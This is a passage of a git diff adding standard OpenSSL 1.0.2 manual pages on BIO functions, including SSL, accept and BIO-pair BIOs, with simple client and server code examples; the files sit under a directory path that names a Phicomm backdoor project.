+if the connection was established successfully. A zero or negative
+value is returned if the connection could not be established, the
+call BIO_should_retry() should be used for non blocking connect BIOs
+to determine if the call should be retried. If an SSL connection has
+already been established this call has no effect.
+
+=head1 NOTES
+
+SSL BIOs are exceptional in that if the underlying transport
+is non blocking they can still request a retry in exceptional
+circumstances. Specifically this will happen if a session
+renegotiation takes place during a BIO_read() operation, one
+case where this happens is when step up occurs.
+
+In OpenSSL 0.9.6 and later the SSL flag SSL_AUTO_RETRY can be
+set to disable this behaviour. That is when this flag is set
+an SSL BIO using a blocking transport will never request a
+retry.
+
+Since unknown BIO_ctrl() operations are sent through filter
+BIOs the servers name and port can be set using BIO_set_host()
+on the BIO returned by BIO_new_ssl_connect() without having
+to locate the connect BIO first.
+
+Applications do not have to call BIO_do_handshake() but may wish
+to do so to separate the handshake process from other I/O
+processing.
+
+=head1 RETURN VALUES
+
+TBA
+
+=head1 EXAMPLE
+
+This SSL/TLS client example, attempts to retrieve a page from an
+SSL/TLS web server. The I/O routines are identical to those of the
+unencrypted example in L<BIO_s_connect(3)|BIO_s_connect(3)>.
+
+ BIO *sbio, *out;
+ int len;
+ char tmpbuf[1024];
+ SSL_CTX *ctx;
+ SSL *ssl;
+
+ ERR_load_crypto_strings();
+ ERR_load_SSL_strings();
+ OpenSSL_add_all_algorithms();
+
+ /* We would seed the PRNG here if the platform didn't
+  * do it automatically
+  */
+
+ ctx = SSL_CTX_new(SSLv23_client_method());
+
+ /* We'd normally set some stuff like the verify paths and
+  * mode here because as things stand this will connect to
+  * any server whose certificate is signed by any CA.
+  */
+
+ sbio = BIO_new_ssl_connect(ctx);
+
+ BIO_get_ssl(sbio, &ssl);
+
+ if(!ssl) {
+   fprintf(stderr, "Can't locate SSL pointer\n");
+   /* whatever ... */
+ }
+
+ /* Don't want any retries */
+ SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
+
+ /* We might want to do other things with ssl here */
+
+ BIO_set_conn_hostname(sbio, "localhost:https");
+
+ out = BIO_new_fp(stdout, BIO_NOCLOSE);
+ if(BIO_do_connect(sbio) <= 0) {
+	fprintf(stderr, "Error connecting to server\n");
+	ERR_print_errors_fp(stderr);
+	/* whatever ... */
+ }
+
+ if(BIO_do_handshake(sbio) <= 0) {
+	fprintf(stderr, "Error establishing SSL connection\n");
+	ERR_print_errors_fp(stderr);
+	/* whatever ... */
+ }
+
+ /* Could examine ssl here to get connection info */
+
+ BIO_puts(sbio, "GET / HTTP/1.0\n\n");
+ for(;;) {	
+	len = BIO_read(sbio, tmpbuf, 1024);
+	if(len <= 0) break;
+	BIO_write(out, tmpbuf, len);
+ }
+ BIO_free_all(sbio);
+ BIO_free(out);
+
+Here is a simple server example. It makes use of a buffering
+BIO to allow lines to be read from the SSL BIO using BIO_gets.
+It creates a pseudo web page containing the actual request from
+a client and also echoes the request to standard output.
+
+ BIO *sbio, *bbio, *acpt, *out;
+ int len;
+ char tmpbuf[1024];
+ SSL_CTX *ctx;
+ SSL *ssl;
+
+ ERR_load_crypto_strings();
+ ERR_load_SSL_strings();
+ OpenSSL_add_all_algorithms();
+
+ /* Might seed PRNG here */
+
+ ctx = SSL_CTX_new(SSLv23_server_method());
+
+ if (!SSL_CTX_use_certificate_file(ctx,"server.pem",SSL_FILETYPE_PEM)
+	|| !SSL_CTX_use_PrivateKey_file(ctx,"server.pem",SSL_FILETYPE_PEM)
+	|| !SSL_CTX_check_private_key(ctx)) {
+
+	fprintf(stderr, "Error setting up SSL_CTX\n");
+	ERR_print_errors_fp(stderr);
+	return 0;
+ }
+
+ /* Might do other things here like setting verify locations and
+  * DH and/or RSA temporary key callbacks
+  */
+
+ /* New SSL BIO setup as server */
+ sbio=BIO_new_ssl(ctx,0);
+
+ BIO_get_ssl(sbio, &ssl);
+
+ if(!ssl) {
+   fprintf(stderr, "Can't locate SSL pointer\n");
+   /* whatever ... */
+ }
+
+ /* Don't want any retries */
+ SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
+
+ /* Create the buffering BIO */
+
+ bbio = BIO_new(BIO_f_buffer());
+
+ /* Add to chain */
+ sbio = BIO_push(bbio, sbio);
+
+ acpt=BIO_new_accept("4433");
+
+ /* By doing this when a new connection is established
+  * we automatically have sbio inserted into it. The
+  * BIO chain is now 'swallowed' by the accept BIO and
+  * will be freed when the accept BIO is freed. 
+  */
+ 
+ BIO_set_accept_bios(acpt,sbio);
+
+ out = BIO_new_fp(stdout, BIO_NOCLOSE);
+
+ /* Setup accept BIO */
+ if(BIO_do_accept(acpt) <= 0) {
+	fprintf(stderr, "Error setting up accept BIO\n");
+	ERR_print_errors_fp(stderr);
+	return 0;
+ }
+
+ /* Now wait for incoming connection */
+ if(BIO_do_accept(acpt) <= 0) {
+	fprintf(stderr, "Error in connection\n");
+	ERR_print_errors_fp(stderr);
+	return 0;
+ }
+
+ /* We only want one connection so remove and free
+  * accept BIO
+  */
+
+ sbio = BIO_pop(acpt);
+
+ BIO_free_all(acpt);
+
+ if(BIO_do_handshake(sbio) <= 0) {
+	fprintf(stderr, "Error in SSL handshake\n");
+	ERR_print_errors_fp(stderr);
+	return 0;
+ }
+
+ BIO_puts(sbio, "HTTP/1.0 200 OK\r\nContent-type: text/plain\r\n\r\n");
+ BIO_puts(sbio, "\r\nConnection Established\r\nRequest headers:\r\n");
+ BIO_puts(sbio, "--------------------------------------------------\r\n");
+
+ for(;;) {
+ 	len = BIO_gets(sbio, tmpbuf, 1024);
+        if(len <= 0) break;
+	BIO_write(sbio, tmpbuf, len);
+	BIO_write(out, tmpbuf, len);
+	/* Look for blank line signifying end of headers*/
+	if((tmpbuf[0] == '\r') || (tmpbuf[0] == '\n')) break;
+ }
+
+ BIO_puts(sbio, "--------------------------------------------------\r\n");
+ BIO_puts(sbio, "\r\n");
+
+ /* Since there is a buffering BIO present we had better flush it */
+ BIO_flush(sbio);
+
+ BIO_free_all(sbio);
+
+=head1 BUGS
+
+In OpenSSL versions before 1.0.0 the BIO_pop() call was handled incorrectly,
+the I/O BIO reference count was incorrectly incremented (instead of
+decremented) and dissociated with the SSL BIO even if the SSL BIO was not
+explicitly being popped (e.g. a pop higher up the chain). Applications which
+included workarounds for this bug (e.g. freeing BIOs more than once) should
+be modified to handle this fix or they may free up an already freed BIO.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_find_type.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_find_type.pod
new file mode 100644
index 0000000..2595200
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_find_type.pod
@@ -0,0 +1,98 @@
+=pod
+
+=head1 NAME
+
+BIO_find_type, BIO_next, BIO_method_type - BIO chain traversal
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO *	BIO_find_type(BIO *b,int bio_type);
+ BIO *	BIO_next(BIO *b);
+
+ #define BIO_method_type(b)		((b)->method->type)
+
+ #define BIO_TYPE_NONE		0
+ #define BIO_TYPE_MEM		(1|0x0400)
+ #define BIO_TYPE_FILE		(2|0x0400)
+
+ #define BIO_TYPE_FD		(4|0x0400|0x0100)
+ #define BIO_TYPE_SOCKET		(5|0x0400|0x0100)
+ #define BIO_TYPE_NULL		(6|0x0400)
+ #define BIO_TYPE_SSL		(7|0x0200)
+ #define BIO_TYPE_MD		(8|0x0200)
+ #define BIO_TYPE_BUFFER		(9|0x0200)
+ #define BIO_TYPE_CIPHER		(10|0x0200)
+ #define BIO_TYPE_BASE64		(11|0x0200)
+ #define BIO_TYPE_CONNECT	(12|0x0400|0x0100)
+ #define BIO_TYPE_ACCEPT		(13|0x0400|0x0100)
+ #define BIO_TYPE_PROXY_CLIENT	(14|0x0200)
+ #define BIO_TYPE_PROXY_SERVER	(15|0x0200)
+ #define BIO_TYPE_NBIO_TEST	(16|0x0200)
+ #define BIO_TYPE_NULL_FILTER	(17|0x0200)
+ #define BIO_TYPE_BER		(18|0x0200)
+ #define BIO_TYPE_BIO		(19|0x0400)
+
+ #define BIO_TYPE_DESCRIPTOR	0x0100
+ #define BIO_TYPE_FILTER		0x0200
+ #define BIO_TYPE_SOURCE_SINK	0x0400
+
+=head1 DESCRIPTION
+
+The BIO_find_type() searches for a BIO of a given type in a chain, starting
+at BIO B<b>. If B<type> is a specific type (such as BIO_TYPE_MEM) then a search
+is made for a BIO of that type. If B<type> is a general type (such as
+B<BIO_TYPE_SOURCE_SINK>) then the next matching BIO of the given general type is
+searched for. BIO_find_type() returns the next matching BIO or NULL if none is
+found.
+
+Note: not all the B<BIO_TYPE_*> types above have corresponding BIO implementations.
+
+BIO_next() returns the next BIO in a chain. It can be used to traverse all BIOs
+in a chain or used in conjunction with BIO_find_type() to find all BIOs of a
+certain type.
+
+BIO_method_type() returns the type of a BIO.
+
+=head1 RETURN VALUES
+
+BIO_find_type() returns a matching BIO or NULL for no match.
+
+BIO_next() returns the next BIO in a chain.
+
+BIO_method_type() returns the type of the BIO B<b>.
+
+=head1 NOTES
+
+BIO_next() was added to OpenSSL 0.9.6 to provide a 'clean' way to traverse a BIO
+chain or find multiple matches using BIO_find_type(). Previous versions had to
+use:
+
+ next = bio->next_bio;
+
+=head1 BUGS
+
+BIO_find_type() in OpenSSL 0.9.5a and earlier could not be safely passed a
+NULL pointer for the B<b> argument.
+
+=head1 EXAMPLE
+
+Traverse a chain looking for digest BIOs:
+
+ BIO *btmp;
+ btmp = in_bio;	/* in_bio is chain to search through */
+
+ do {
+ 	btmp = BIO_find_type(btmp, BIO_TYPE_MD);
+	if(btmp == NULL) break;	/* Not found */
+	/* btmp is a digest BIO, do something with it ...*/
+   	...
+
+	btmp = BIO_next(btmp);
+ } while(btmp);
+
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new.pod
new file mode 100644
index 0000000..2a245fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new.pod
@@ -0,0 +1,65 @@
+=pod
+
+=head1 NAME
+
+BIO_new, BIO_set, BIO_free, BIO_vfree, BIO_free_all - BIO allocation and freeing functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO *	BIO_new(BIO_METHOD *type);
+ int	BIO_set(BIO *a,BIO_METHOD *type);
+ int	BIO_free(BIO *a);
+ void	BIO_vfree(BIO *a);
+ void	BIO_free_all(BIO *a);
+
+=head1 DESCRIPTION
+
+The BIO_new() function returns a new BIO using method B<type>.
+
+BIO_set() sets the method of an already existing BIO.
+
+BIO_free() frees up a single BIO, BIO_vfree() also frees up a single BIO
+but it does not return a value. Calling BIO_free() may also have some effect
+on the underlying I/O structure, for example it may close the file being
+referred to under certain circumstances. For more details see the individual
+BIO_METHOD descriptions.
+
+BIO_free_all() frees up an entire BIO chain, it does not halt if an error
+occurs freeing up an individual BIO in the chain.
+
+=head1 RETURN VALUES
+
+BIO_new() returns a newly created BIO or NULL if the call fails.
+
+BIO_set(), BIO_free() return 1 for success and 0 for failure.
+
+BIO_free_all() and BIO_vfree() do not return values.
+
+=head1 NOTES
+
+Some BIOs (such as memory BIOs) can be used immediately after calling
+BIO_new(). Others (such as file BIOs) need some additional initialization,
+and frequently a utility function exists to create and initialize such BIOs.
+
+If BIO_free() is called on a BIO chain it will only free one BIO resulting
+in a memory leak.
+
+Calling BIO_free_all() a single BIO has the same effect as calling BIO_free()
+on it other than the discarded return value.
+
+Normally the B<type> argument is supplied by a function which returns a
+pointer to a BIO_METHOD. There is a naming convention for such functions:
+a source/sink BIO is normally called BIO_s_*() and a filter BIO
+BIO_f_*();
+
+=head1 EXAMPLE
+
+Create a memory BIO:
+
+ BIO *mem = BIO_new(BIO_s_mem());
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new_CMS.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new_CMS.pod
new file mode 100644
index 0000000..9e3a4b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_new_CMS.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+ BIO_new_CMS - CMS streaming filter BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ BIO *BIO_new_CMS(BIO *out, CMS_ContentInfo *cms);
+
+=head1 DESCRIPTION
+
+BIO_new_CMS() returns a streaming filter BIO chain based on B<cms>. The output
+of the filter is written to B<out>. Any data written to the chain is
+automatically translated to a BER format CMS structure of the appropriate type.
+
+=head1 NOTES
+
+The chain returned by this function behaves like a standard filter BIO. It
+supports non blocking I/O. Content is processed and streamed on the fly and not
+all held in memory at once: so it is possible to encode very large structures.
+After all content has been written through the chain BIO_flush() must be called
+to finalise the structure.
+
+The B<CMS_STREAM> flag must be included in the corresponding B<flags>
+parameter of the B<cms> creation function.
+
+If an application wishes to write additional data to B<out> BIOs should be
+removed from the chain using BIO_pop() and freed with BIO_free() until B<out>
+is reached. If no additional data needs to be written BIO_free_all() can be
+called to free up the whole chain.
+
+Any content written through the filter is used verbatim: no canonical
+translation is performed.
+
+It is possible to chain multiple BIOs to, for example, create a triple wrapped
+signed, enveloped, signed structure. In this case it is the applications
+responsibility to set the inner content type of any outer CMS_ContentInfo
+structures.
+
+Large numbers of small writes through the chain should be avoided as this will
+produce an output consisting of lots of OCTET STRING structures. Prepending
+a BIO_f_buffer() buffering BIO will prevent this.
+
+=head1 BUGS
+
+There is currently no corresponding inverse BIO: i.e. one which can decode
+a CMS structure on the fly.
+
+=head1 RETURN VALUES
+
+BIO_new_CMS() returns a BIO chain when successful or NULL if an error
+occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_encrypt(3)|CMS_encrypt(3)>
+
+=head1 HISTORY
+
+BIO_new_CMS() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_push.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_push.pod
new file mode 100644
index 0000000..8a2657c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_push.pod
@@ -0,0 +1,69 @@
+=pod
+
+=head1 NAME
+
+BIO_push, BIO_pop - add and remove BIOs from a chain.
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO *	BIO_push(BIO *b,BIO *append);
+ BIO *	BIO_pop(BIO *b);
+
+=head1 DESCRIPTION
+
+The BIO_push() function appends the BIO B<append> to B<b>, it returns
+B<b>.
+
+BIO_pop() removes the BIO B<b> from a chain and returns the next BIO
+in the chain, or NULL if there is no next BIO. The removed BIO then
+becomes a single BIO with no association with the original chain,
+it can thus be freed or attached to a different chain.
+
+=head1 NOTES
+
+The names of these functions are perhaps a little misleading. BIO_push()
+joins two BIO chains whereas BIO_pop() deletes a single BIO from a chain,
+the deleted BIO does not need to be at the end of a chain.
+
+The process of calling BIO_push() and BIO_pop() on a BIO may have additional
+consequences (a control call is made to the affected BIOs) any effects will
+be noted in the descriptions of individual BIOs.
+
+=head1 EXAMPLES
+
+For these examples suppose B<md1> and B<md2> are digest BIOs, B<b64> is
+a base64 BIO and B<f> is a file BIO.
+
+If the call:
+
+ BIO_push(b64, f);
+
+is made then the new chain will be B<b64-f>. After making the calls
+
+ BIO_push(md2, b64);
+ BIO_push(md1, md2);
+
+the new chain is B<md1-md2-b64-f>. Data written to B<md1> will be digested
+by B<md1> and B<md2>, B<base64> encoded and written to B<f>.
+
+It should be noted that reading causes data to pass in the reverse
+direction, that is data is read from B<f>, base64 B<decoded> and digested
+by B<md1> and B<md2>. If the call:
+
+ BIO_pop(md2);
+
+The call will return B<b64> and the new chain will be B<md1-b64-f> data can
+be written to B<md1> as before.
+
+=head1 RETURN VALUES
+
+BIO_push() returns the end of the chain, B<b>.
+
+BIO_pop() returns the next BIO in the chain, or NULL if there is no next
+BIO.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_read.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_read.pod
new file mode 100644
index 0000000..b345281
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_read.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+BIO_read, BIO_write, BIO_gets, BIO_puts - BIO I/O functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ int	BIO_read(BIO *b, void *buf, int len);
+ int	BIO_gets(BIO *b,char *buf, int size);
+ int	BIO_write(BIO *b, const void *buf, int len);
+ int	BIO_puts(BIO *b,const char *buf);
+
+=head1 DESCRIPTION
+
+BIO_read() attempts to read B<len> bytes from BIO B<b> and places
+the data in B<buf>.
+
+BIO_gets() performs the BIOs "gets" operation and places the data
+in B<buf>. Usually this operation will attempt to read a line of data
+from the BIO of maximum length B<len>. There are exceptions to this
+however, for example BIO_gets() on a digest BIO will calculate and
+return the digest and other BIOs may not support BIO_gets() at all.
+
+BIO_write() attempts to write B<len> bytes from B<buf> to BIO B<b>.
+
+BIO_puts() attempts to write a null terminated string B<buf> to BIO B<b>
+
+=head1 RETURN VALUES
+
+All these functions return either the amount of data successfully read or
+written (if the return value is positive) or that no data was successfully
+read or written if the result is 0 or -1. If the return value is -2 then
+the operation is not implemented in the specific BIO type.
+
+=head1 NOTES
+
+A 0 or -1 return is not necessarily an indication of an error. In
+particular when the source/sink is non-blocking or of a certain type
+it may merely be an indication that no data is currently available and that
+the application should retry the operation later.
+
+One technique sometimes used with blocking sockets is to use a system call
+(such as select(), poll() or equivalent) to determine when data is available
+and then call read() to read the data. The equivalent with BIOs (that is call
+select() on the underlying I/O structure and then call BIO_read() to
+read the data) should B<not> be used because a single call to BIO_read()
+can cause several reads (and writes in the case of SSL BIOs) on the underlying
+I/O structure and may block as a result. Instead select() (or equivalent)
+should be combined with non blocking I/O so successive reads will request
+a retry instead of blocking.
+
+See L<BIO_should_retry(3)|BIO_should_retry(3)> for details of how to
+determine the cause of a retry and other I/O issues.
+
+If the BIO_gets() function is not supported by a BIO then it possible to
+work around this by adding a buffering BIO L<BIO_f_buffer(3)|BIO_f_buffer(3)>
+to the chain.
+
+=head1 SEE ALSO
+
+L<BIO_should_retry(3)|BIO_should_retry(3)>
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_accept.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_accept.pod
new file mode 100644
index 0000000..560c112
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_accept.pod
@@ -0,0 +1,195 @@
+=pod
+
+=head1 NAME
+
+BIO_s_accept, BIO_set_accept_port, BIO_get_accept_port, BIO_new_accept,
+BIO_set_nbio_accept, BIO_set_accept_bios, BIO_set_bind_mode,
+BIO_get_bind_mode, BIO_do_accept - accept BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *BIO_s_accept(void);
+
+ long BIO_set_accept_port(BIO *b, char *name);
+ char *BIO_get_accept_port(BIO *b);
+
+ BIO *BIO_new_accept(char *host_port);
+
+ long BIO_set_nbio_accept(BIO *b, int n);
+ long BIO_set_accept_bios(BIO *b, char *bio);
+
+ long BIO_set_bind_mode(BIO *b, long mode);
+ long BIO_get_bind_mode(BIO *b, long dummy);
+
+ #define BIO_BIND_NORMAL		0
+ #define BIO_BIND_REUSEADDR_IF_UNUSED	1
+ #define BIO_BIND_REUSEADDR		2
+
+ int BIO_do_accept(BIO *b);
+
+=head1 DESCRIPTION
+
+BIO_s_accept() returns the accept BIO method. This is a wrapper
+round the platform's TCP/IP socket accept routines.
+
+Using accept BIOs, TCP/IP connections can be accepted and data
+transferred using only BIO routines. In this way any platform
+specific operations are hidden by the BIO abstraction.
+
+Read and write operations on an accept BIO will perform I/O
+on the underlying connection. If no connection is established
+and the port (see below) is set up properly then the BIO
+waits for an incoming connection.
+
+Accept BIOs support BIO_puts() but not BIO_gets().
+
+If the close flag is set on an accept BIO then any active
+connection on that chain is shutdown and the socket closed when
+the BIO is freed.
+
+Calling BIO_reset() on a accept BIO will close any active
+connection and reset the BIO into a state where it awaits another
+incoming connection.
+
+BIO_get_fd() and BIO_set_fd() can be called to retrieve or set
+the accept socket. See L<BIO_s_fd(3)|BIO_s_fd(3)>
+
+BIO_set_accept_port() uses the string B<name> to set the accept
+port. The port is represented as a string of the form "host:port",
+where "host" is the interface to use and "port" is the port.
+The host can be can be "*" which is interpreted as meaning
+any interface; "port" has the same syntax
+as the port specified in BIO_set_conn_port() for connect BIOs,
+that is it can be a numerical port string or a string to lookup
+using getservbyname() and a string table.
+
+BIO_new_accept() combines BIO_new() and BIO_set_accept_port() into
+a single call: that is it creates a new accept BIO with port
+B<host_port>.
+
+BIO_set_nbio_accept() sets the accept socket to blocking mode
+(the default) if B<n> is 0 or non blocking mode if B<n> is 1.
+
+BIO_set_accept_bios() can be used to set a chain of BIOs which
+will be duplicated and prepended to the chain when an incoming
+connection is received. This is useful if, for example, a 
+buffering or SSL BIO is required for each connection. The
+chain of BIOs must not be freed after this call, they will
+be automatically freed when the accept BIO is freed.
+
+BIO_set_bind_mode() and BIO_get_bind_mode() set and retrieve
+the current bind mode. If BIO_BIND_NORMAL (the default) is set
+then another socket cannot be bound to the same port. If
+BIO_BIND_REUSEADDR is set then other sockets can bind to the
+same port. If BIO_BIND_REUSEADDR_IF_UNUSED is set then and
+attempt is first made to use BIO_BIN_NORMAL, if this fails
+and the port is not in use then a second attempt is made
+using BIO_BIND_REUSEADDR.
+
+BIO_do_accept() serves two functions. When it is first
+called, after the accept BIO has been setup, it will attempt
+to create the accept socket and bind an address to it. Second
+and subsequent calls to BIO_do_accept() will await an incoming
+connection, or request a retry in non blocking mode.
+
+=head1 NOTES
+
+When an accept BIO is at the end of a chain it will await an
+incoming connection before processing I/O calls. When an accept
+BIO is not at then end of a chain it passes I/O calls to the next
+BIO in the chain.
+
+When a connection is established a new socket BIO is created for
+the connection and appended to the chain. That is the chain is now
+accept->socket. This effectively means that attempting I/O on
+an initial accept socket will await an incoming connection then
+perform I/O on it.
+
+If any additional BIOs have been set using BIO_set_accept_bios()
+then they are placed between the socket and the accept BIO,
+that is the chain will be accept->otherbios->socket.
+
+If a server wishes to process multiple connections (as is normally
+the case) then the accept BIO must be made available for further
+incoming connections. This can be done by waiting for a connection and
+then calling:
+
+ connection = BIO_pop(accept);
+
+After this call B<connection> will contain a BIO for the recently
+established connection and B<accept> will now be a single BIO
+again which can be used to await further incoming connections.
+If no further connections will be accepted the B<accept> can
+be freed using BIO_free().
+
+If only a single connection will be processed it is possible to
+perform I/O using the accept BIO itself. This is often undesirable
+however because the accept BIO will still accept additional incoming
+connections. This can be resolved by using BIO_pop() (see above)
+and freeing up the accept BIO after the initial connection.
+
+If the underlying accept socket is non-blocking and BIO_do_accept() is
+called to await an incoming connection it is possible for
+BIO_should_io_special() with the reason BIO_RR_ACCEPT. If this happens
+then it is an indication that an accept attempt would block: the application
+should take appropriate action to wait until the underlying socket has
+accepted a connection and retry the call.
+
+BIO_set_accept_port(), BIO_get_accept_port(), BIO_set_nbio_accept(),
+BIO_set_accept_bios(), BIO_set_bind_mode(), BIO_get_bind_mode() and
+BIO_do_accept() are macros.
+
+=head1 RETURN VALUES
+
+TBA
+
+=head1 EXAMPLE
+
+This example accepts two connections on port 4444, sends messages
+down each and finally closes both down.
+
+ BIO *abio, *cbio, *cbio2;
+ ERR_load_crypto_strings();
+ abio = BIO_new_accept("4444");
+
+ /* First call to BIO_accept() sets up accept BIO */
+ if(BIO_do_accept(abio) <= 0) {
+	fprintf(stderr, "Error setting up accept\n");
+	ERR_print_errors_fp(stderr);
+	exit(0);		
+ }
+
+ /* Wait for incoming connection */
+ if(BIO_do_accept(abio) <= 0) {
+	fprintf(stderr, "Error accepting connection\n");
+	ERR_print_errors_fp(stderr);
+	exit(0);		
+ }
+ fprintf(stderr, "Connection 1 established\n");
+ /* Retrieve BIO for connection */
+ cbio = BIO_pop(abio);
+ BIO_puts(cbio, "Connection 1: Sending out Data on initial connection\n");
+ fprintf(stderr, "Sent out data on connection 1\n");
+ /* Wait for another connection */
+ if(BIO_do_accept(abio) <= 0) {
+	fprintf(stderr, "Error accepting connection\n");
+	ERR_print_errors_fp(stderr);
+	exit(0);		
+ }
+ fprintf(stderr, "Connection 2 established\n");
+ /* Close accept BIO to refuse further connections */
+ cbio2 = BIO_pop(abio);
+ BIO_free(abio);
+ BIO_puts(cbio2, "Connection 2: Sending out Data on second\n");
+ fprintf(stderr, "Sent out data on connection 2\n");
+
+ BIO_puts(cbio, "Connection 1: Second connection established\n");
+ /* Close the two established connections */
+ BIO_free(cbio);
+ BIO_free(cbio2);
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_bio.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_bio.pod
new file mode 100644
index 0000000..8d0a55a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_s_bio.pod
@@ -0,0 +1,182 @@
+=pod
+
+=head1 NAME
+
+BIO_s_bio, BIO_make_bio_pair, BIO_destroy_bio_pair, BIO_shutdown_wr, 
+BIO_set_write_buf_size, BIO_get_write_buf_size, BIO_new_bio_pair,
+BIO_get_write_guarantee, BIO_ctrl_get_write_guarantee, BIO_get_read_request,
+BIO_ctrl_get_read_request, BIO_ctrl_reset_read_request - BIO pair BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *BIO_s_bio(void);
+
+ #define BIO_make_bio_pair(b1,b2)   (int)BIO_ctrl(b1,BIO_C_MAKE_BIO_PAIR,0,b2)
+ #define BIO_destroy_bio_pair(b)    (int)BIO_ctrl(b,BIO_C_DESTROY_BIO_PAIR,0,NULL)
+
+ #define BIO_shutdown_wr(b) (int)BIO_ctrl(b, BIO_C_SHUTDOWN_WR, 0, NULL)
+
+ #define BIO_set_write_buf_size(b,size) (int)BIO_ctrl(b,BIO_C_SET_WRITE_BUF_SIZE,size,NULL)
+ #define BIO_get_write_buf_size(b,size) (size_t)BIO_ctrl(b,BIO_C_GET_WRITE_BUF_SIZE,size,NULL)
+
+ int BIO_new_bio_pair(BIO **bio1, size_t writebuf1, BIO **bio2, size_t writebuf2);
+
+ #define BIO_get_write_guarantee(b) (int)BIO_ctrl(b,BIO_C_GET_WRITE_GUARANTEE,0,NULL)
+ size_t BIO_ctrl_get_write_guarantee(BIO *b);
+
+ #define BIO_get_read_request(b)    (int)BIO_ctrl(b,BIO_C_GET_READ_REQUEST,0,NULL)
+ size_t BIO_ctrl_get_read_request(BIO *b);
+
+ int BIO_ctrl_reset_read_request(BIO *b);
+
+=head1 DESCRIPTION
+
+BIO_s_bio() returns the method for a BIO pair. A BIO pair is a pair of source/sink
+BIOs where data written to either half of the pair is buffered and can be read from
+the other half. Both halves must usually by handled by the same application thread
+since no locking is done on the internal data structures.
+
+Since BIO chains typically end in a source/sink BIO it is possible to make this
+one half of a BIO pair and have all the data processed by the chain under application
+control.
+
+One typical use of BIO pairs is to place TLS/SSL I/O under application control, this
+can be used when the application wishes to use a non standard transport for
+TLS/SSL or the normal socket routines are inappropriate.
+
+Calls to BIO_read() will read data from the buffer or request a retry if no
+data is available.
+
+Calls to BIO_write() will place data in the buffer or request a retry if the
+buffer is full.
+
+The standard calls BIO_ctrl_pending() and BIO_ctrl_wpending() can be used to
+determine the amount of pending data in the read or write buffer.
+
+BIO_reset() clears any data in the write buffer.
+
+BIO_make_bio_pair() joins two separate BIOs into a connected pair.
+
+BIO_destroy_pair() destroys the association between two connected BIOs. Freeing
+up any half of the pair will automatically destroy the association.
+
+BIO_shutdown_wr() is used to close down a BIO B<b>. After this call no further
+writes on BIO B<b> are allowed (they will return an error). Reads on the other
+half of the pair will return any pending data or EOF when all pending data has
+been read. 
+
+BIO_set_write_buf_size() sets the write buffer size of BIO B<b> to B<size>.
+If the size is not initialized a default value is used. This is currently
+17K, sufficient for a maximum size TLS record.
+
+BIO_get_write_buf_size() returns the size of the write buffer.
+
+BIO_new_bio_pair() combines the calls to BIO_new(), BIO_make_bio_pair() and
+BIO_set_write_buf_size() to create a connected pair of BIOs B<bio1>, B<bio2>
+with write buffer sizes B<writebuf1> and B<writebuf2>. If either size is
+zero then the default size is used.  BIO_new_bio_pair() does not check whether
+B<bio1> or B<bio2> do point to some other BIO, the values are overwritten,
+BIO_free() is not called.
+
+BIO_get_write_guarantee() and BIO_ctrl_get_write_guarantee() return the maximum
+length of data that can be currently written to the BIO. Writes larger than this
+value will return a value from BIO_write() less than the amount requested or if the
+buffer is full request a retry. BIO_ctrl_get_write_guarantee() is a function
+whereas BIO_get_write_guarantee() is a macro.
+
